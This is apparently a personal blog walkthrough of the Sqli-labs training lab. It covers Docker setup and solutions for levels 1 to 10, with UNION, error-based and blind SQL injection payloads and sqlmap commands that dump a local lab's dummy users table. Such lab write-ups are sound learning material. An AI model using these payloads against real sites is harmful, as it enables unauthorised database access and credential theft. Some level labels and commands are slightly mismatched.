Learning Sqli-labs:Walkthrough & Notes

Setup(Target & Environment)

Target

Learning SQL injection penetration testing using Sqli-labs. Target: Clear ALL.

Environment

Name Version
VMware(Ubuntu) v22.04
Docker v29.6.1
Xshell v7
FireFox v143.0
HackBar 0140454

Building step

First,try to install Docker on your ubuntu,then verify the installation.

verify Docker status

Pull the Docker image of Sqli-labs, please check your network if you encounter connection reset by peer.

1
2
3
# docker pull acgpiano/sqli-labs
# docker run -it -d --name sqli-labs -p 8081:80 -p 13306:3306 acgpiano/sqli-labs
# docker ps

image-20260714095916947

Open a web brower(e.g.,Firefox or Google Chrome) and Visit Url:http://192.168.44.142:8081 (replace with your own IP address)

image-20260714100315468

Enter the Docker container,connect to the MySQL server and create the databases “security”.

1
2
3
# docker exec -it sqli-labs /bin/bash
# mysql
# create databases security

image-20260714100836738

Finished creating.Enter the sqli-labs directory and check the configuration file (db-creds.inc[main file]).Only review it; do not make any changes.

1
# cd /var/www/html/sql-connections

image-20260714101211159

Return to the web brower and click the Setup/reset Database for labs button to install.

image-20260714101647959

So far,the environment setup is complete.

Process(Learning & Record)

Less-1

image-20260714104342779

Test to enumerate the column names via SQL injection.

image-20260714104436138

Extract all user data via SQL injection.0x3a replace ;.

image-20260714104640170

Less-2

Test

1
2
3
http://192.168.44.142:8081/Less-2/
?id=2' and 1=1 --+
Error tips:*You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' -- LIMIT 0,1' at line 1*

Test to retrieve the database name via SQL injection.

1
2
http://192.168.44.142:8081/Less-2/
?id=20 union select 1,2,group_concat(schema_name) from information_schema.schemata --+

Extract all user data via SQL injection.0x3a replace ;.

1
2
3
4
5
http://192.168.44.142:8081/Less-2/
?id=20 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() --+

http://192.168.44.142:8081/Less-2/
?id=20 union select 1,2,group_concat(username,0x3a,password) from users --+

Less-3

Test

1
2
3
4
5
6
7
8
9
10
11
http://192.168.44.142:8081/Less-3/
?id=-1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''-1'') LIMIT 0,1' at line 1

http://192.168.44.142:8081/Less-3/
?id=-1' --+
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

http://192.168.44.142:8081/Less-3/
?id=-1') order by 4 --+
Unknown column '4' in 'order clause'

Test to retrieve the database name via SQL injection.

1
2
http://192.168.44.142:8081/Less-3/
?id=-1') union select 1,2,group_concat(schema_name) from information_schema.schemata --+

Extract all user data via SQL injection.

1
2
3
4
5
http://192.168.44.142:8081/Less-3/
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() --+

http://192.168.44.142:8081/Less-3/
?id=-1') union select 1,2,group_concat(username,0x3a,password) from users --+

Less-4

Test

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
http://192.168.44.142:8081/Less-4/
?id=1' --+
Welcome Dhakkan
Your Login name:Dumb
Your Password:Dumb

http://192.168.44.142:8081/Less-4/
?id=1" --+
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

http://192.168.44.142:8081/Less-4/
?id=1") and 1=1 --+
Welcome Dhakkan
Your Login name:Dumb
Your Password:Dumb

http://192.168.44.142:8081/Less-4/
?id=1") and 1=2 --+
Welcome Dhakkan

You will discover the difference between and 1=1 and and 1=2.

Test to retrieve the database name via SQL injection.

1
2
3
4
5
http://192.168.44.142:8081/Less-4/
?id=0") union select 1,2,group_concat(schema_name) from information_schema.schemata --+
Welcome Dhakkan
Your Login name:2
Your Password:information_schema,challenges,mysql,performance_schema,security

Extract all user data via SQL injection.

1
2
3
4
5
http://192.168.44.142:8081/Less-4/
?id=0") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() --+

http://192.168.44.142:8081/Less-4/
?id=0") union select 1,2,group_concat(username,0x3a,password) from users --+

Less-5

Test

1
2
3
4
5
6
7
8
http://192.168.44.142:8081/Less-5/
?id=1' --+
Welcome Dhakkan
You are in...........

http://192.168.44.142:8081/Less-5/
?id=1'
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

Find the enjection point.It’s an error enjection category.Try to use the updatexml() function to exploit it.

1
2
3
4
http://192.168.44.142:8081/Less-5/
?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(username,0x3a,password) from users),1,31),0x7e),1) --+
Welcome Dhakkan
XPATH syntax error: '~Dumb:Dumb,Angelina:I-kill-you,D'

Only 31 characters can be displayed due to the updateXML() function’s limit.So bro,u know.Modify the parameters in the statement — change 1 and 31 to 32 and 64.

1
2
3
4
http://192.168.44.142:8081/Less-5/
?id=1' and updatexml(1,concat(0x7e,substr((select group_concat(username,0x3a,password) from users),32,63),0x7e),1) --+
Welcome Dhakkan
XPATH syntax error: '~ummy:p@ssword,secure:crappy,stu'

Less-6

Test

1
2
3
4
5
6
7
8
http://192.168.44.142:8081/Less-6/
?id=1
Welcome Dhakkan
You are in...........

http://192.168.44.142:8081/Less-6/
?id=1"
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"" LIMIT 0,1' at line 1

We will find that it only modifies basics of Less-5

1
2
3
4
http://192.168.44.142:8081/Less-6/
?id=1" and updatexml(1,concat(0x7e,substr((select group_concat(username,0x3a,password) from users),1,32),0x7e),1) --+
Welcome Dhakkan
XPATH syntax error: '~Dumb:Dumb,Angelina:I-kill-you,D'

Then,Without further elaboration.

Less-7

It’s diffcuilt.This level mainly tests blind SQL injection.I tried various approaches, including Burp Suite, but they were too cumbersome. Finally, I decided to use sqlmap to perform blind injection.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
# Get db's name
sqlmap -u "http://192.168.44.142:8081/Less-8/?id=1" --dbs

# Get table's name
sqlmap -u "http://192.168.44.142:8081/Less-8/?id=1" -D security --tables

# Get columns'name
sqlmap -u "http://192.168.44.142:8081/Less-8/?id=1" -D security -T users --columns

# Get Data
sqlmap -u "http://192.168.44.142:8081/Less-8/?id=1" -D security -T users --dump

Database: security
Table: users
[13 entries]
+----+------------+----------+
| id | password | username |
+----+------------+----------+
| 1 | Dumb | Dumb |
| 2 | I-kill-you | Angelina |
| 3 | p@ssword | Dummy |
| 4 | crappy | secure |
| 5 | stupidity | stupid |
| 6 | genious | superman |
| 7 | mob!le | batman |
| 8 | admin | admin |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dumbo | dhakkan |
| 14 | admin4 | admin4 |
+----+------------+----------+

Less-8

Also use sqlmap for injection.Common parameters may cause the injection to run slowly.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
sqlmap -u "http://192.168.44.142:8081/Less-8/?id=1" \
-p id \
--technique B \
--threads 5 \
--batch \
--hex \
-D security -T users --dump

Database: security
Table: users
[13 entries]
+----+------------+----------+
| id | password | username |
+----+------------+----------+
| 1 | Dumb | Dumb |
| 2 | I-kill-you | Angelina |
| 3 | p@ssword | Dummy |
| 4 | crappy | secure |
| 5 | stupidity | stupid |
| 6 | genious | superman |
| 7 | mob!le | batman |
| 8 | admin | admin |
| 9 | admin1 | admin1 |
| 10 | admin2 | admin2 |
| 11 | admin3 | admin3 |
| 12 | dumbo | dhakkan |
| 14 | admin4 | admin4 |
+----+------------+----------+

Less-9

For time-based blinding injection,also use sqlmap.

1
2
3
4
5
6
7
sqlmap -u "http://192.168.44.142:8081/Less-9/?id=1" \                                     
-p id \
--technique B \
--threads 5 \
--batch \
--hex \
-D security -T users --dump

Less-10

Also time-based blinding injection.Use 1=1 requires waiting two seconds.

1
2
3
4
5
6
7
8
9
10
11
http://192.168.44.142:8081/Less-10/
?id=1" and if(1=1,sleep(2),0)-- s

# Construct the payload:
sqlmap -u 'http://192.168.44.142:8081/Less-10/?id=1"' --dbs
available databases [5]:
[*] `security`
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
Author: Bztiks
Link: http://bztiks.github.io/2026/07/14/Learning-Sqli-labs:Walkthrough-Notes/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.